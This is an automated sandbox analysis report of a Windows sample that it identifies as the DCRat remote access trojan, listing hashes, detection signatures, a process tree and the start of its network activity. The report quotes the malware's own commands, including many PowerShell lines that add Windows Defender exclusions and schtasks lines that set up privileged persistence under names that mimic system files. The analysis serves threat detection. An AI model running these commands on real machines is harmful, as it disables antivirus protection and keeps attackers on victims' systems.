Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-12-2024 04:28

General

  • Target

    JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe

  • Size

    1.3MB

  • MD5

    86530bf4b3d606a1f3031a93d8d02712

  • SHA1

    9a4ebab5ec898e73aa30c28fd695ec95e6e6e22b

  • SHA256

    28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7

  • SHA512

    f42cc0f5a0a1a909a9f16a6c08a882dee15ca34e4b6514d2e35c3eb3a0206f11f8cb8230c483baede054248bd93afafe505e524c4d7549aa9e8afb983d1fe771

  • SSDEEP

    24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 36 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 2 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 14 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 13 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs
  • Drops file in Program Files directory 10 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 13 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 36 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious use of AdjustPrivilegeToken 26 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_28c5a31d5015f85f87106a7e876e78aa94801b36fd57d87272315d74c42fb9f7.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3336
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4024
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:360
        • C:\providercommon\DllCommonsvc.exe
          "C:\providercommon\DllCommonsvc.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3544
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4056
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System\RuntimeBroker.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1216
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\explorer.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2508
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4776
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\Network Sharing\DllCommonsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:296
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Adobe\WmiPrvSE.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5000
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3524
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ImmersiveControlPanel\sppsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3352
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4108
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Migration\WTR\System.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2744
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\DllCommonsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3628
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dwm.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3320
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Registry.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1808
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\I1ExlHFW7K.bat"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3760
            • C:\Windows\system32\w32tm.exe
              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
              6⤵
                PID:2244
              • C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
                "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4448
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zDcPfnAXs0.bat"
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2256
                  • C:\Windows\system32\w32tm.exe
                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    8⤵
                      PID:2008
                    • C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
                      "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
                      8⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4712
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pkopelt31u.bat"
                        9⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3512
                        • C:\Windows\system32\w32tm.exe
                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          10⤵
                            PID:3628
                          • C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
                            "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
                            10⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Modifies registry class
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4528
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vCRFnHZZKP.bat"
                              11⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3612
                              • C:\Windows\system32\w32tm.exe
                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                12⤵
                                  PID:4740
                                • C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
                                  "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
                                  12⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Modifies registry class
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:2928
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pI0EcicZAo.bat"
                                    13⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:5028
                                    • C:\Windows\system32\w32tm.exe
                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      14⤵
                                        PID:5076
                                      • C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
                                        "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
                                        14⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • Modifies registry class
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4752
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\F1gdtReUkn.bat"
                                          15⤵
                                            PID:4956
                                            • C:\Windows\system32\w32tm.exe
                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                              16⤵
                                                PID:4524
                                              • C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
                                                "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
                                                16⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                • Modifies registry class
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2972
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\574RqM7W2b.bat"
                                                  17⤵
                                                    PID:2000
                                                    • C:\Windows\system32\w32tm.exe
                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                      18⤵
                                                        PID:4984
                                                      • C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
                                                        "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
                                                        18⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Modifies registry class
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4548
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NfeiSKMyn5.bat"
                                                          19⤵
                                                            PID:660
                                                            • C:\Windows\system32\w32tm.exe
                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                              20⤵
                                                                PID:4188
                                                              • C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
                                                                "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
                                                                20⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                • Modifies registry class
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:948
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EqBdbgL5Ji.bat"
                                                                  21⤵
                                                                    PID:4032
                                                                    • C:\Windows\system32\w32tm.exe
                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                      22⤵
                                                                        PID:4712
                                                                      • C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
                                                                        "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
                                                                        22⤵
                                                                        • Checks computer location settings
                                                                        • Executes dropped EXE
                                                                        • Modifies registry class
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1452
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lHo4kC1bcD.bat"
                                                                          23⤵
                                                                            PID:2488
                                                                            • C:\Windows\system32\w32tm.exe
                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                              24⤵
                                                                                PID:4812
                                                                              • C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
                                                                                "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
                                                                                24⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                • Modifies registry class
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2404
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\D5faDLbbQ0.bat"
                                                                                  25⤵
                                                                                    PID:1216
                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                      26⤵
                                                                                        PID:2904
                                                                                      • C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
                                                                                        "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
                                                                                        26⤵
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2308
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pbgl9PPr7s.bat"
                                                                                          27⤵
                                                                                            PID:2340
                                                                                            • C:\Windows\system32\w32tm.exe
                                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                              28⤵
                                                                                                PID:4640
                                                                                              • C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe
                                                                                                "C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe"
                                                                                                28⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4056
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\System\RuntimeBroker.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:5036
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System\RuntimeBroker.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:5084
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\System\RuntimeBroker.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2636
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Registration\explorer.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2800
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\Configuration\Registration\explorer.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:3680
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Registration\explorer.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2012
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:4148
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:444
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:292
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Media Player\Network Sharing\DllCommonsvc.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2112
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Network Sharing\DllCommonsvc.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:3020
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Media Player\Network Sharing\DllCommonsvc.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:392
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Adobe\WmiPrvSE.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:3112
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\All Users\Adobe\WmiPrvSE.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:4712
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Adobe\WmiPrvSE.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1364
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2972
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2232
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Windows\SystemResources\Windows.UI.Search\Images\WmiPrvSE.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:4512
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Windows\ImmersiveControlPanel\sppsvc.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:808
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\ImmersiveControlPanel\sppsvc.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:5064
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Windows\ImmersiveControlPanel\sppsvc.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2328
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1448
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:3128
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1476
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Windows\Migration\WTR\System.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:4124
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\System.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1468
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Windows\Migration\WTR\System.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2932
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 5 /tr "'C:\Users\Default\DllCommonsvc.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2584
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Users\Default\DllCommonsvc.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:4452
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 6 /tr "'C:\Users\Default\DllCommonsvc.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:3460
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1064
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:3596
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1168
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Registry.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:5096
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Registry.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:776
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Registry.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1268

                                        Network

                                        • flag-us
                                          DNS
                                          104.219.191.52.in-addr.arpa
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          104.219.191.52.in-addr.arpa
                                          IN PTR
                                          Response
                                        • flag-us
                                          DNS
                                          172.210.232.199.in-addr.arpa
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          172.210.232.199.in-addr.arpa
                                          IN PTR
                                          Response
                                        • flag-us
                                          DNS
                                          22.160.190.20.in-addr.arpa
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          22.160.190.20.in-addr.arpa
                                          IN PTR
                                          Response
                                        • flag-us
                                          DNS
                                          95.221.229.192.in-addr.arpa
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          95.221.229.192.in-addr.arpa
                                          IN PTR
                                          Response
                                        • flag-us
                                          DNS
                                          228.249.119.40.in-addr.arpa
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          228.249.119.40.in-addr.arpa
                                          IN PTR
                                          Response
                                        • flag-us
                                          DNS
                                          raw.githubusercontent.com
                                          WmiPrvSE.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
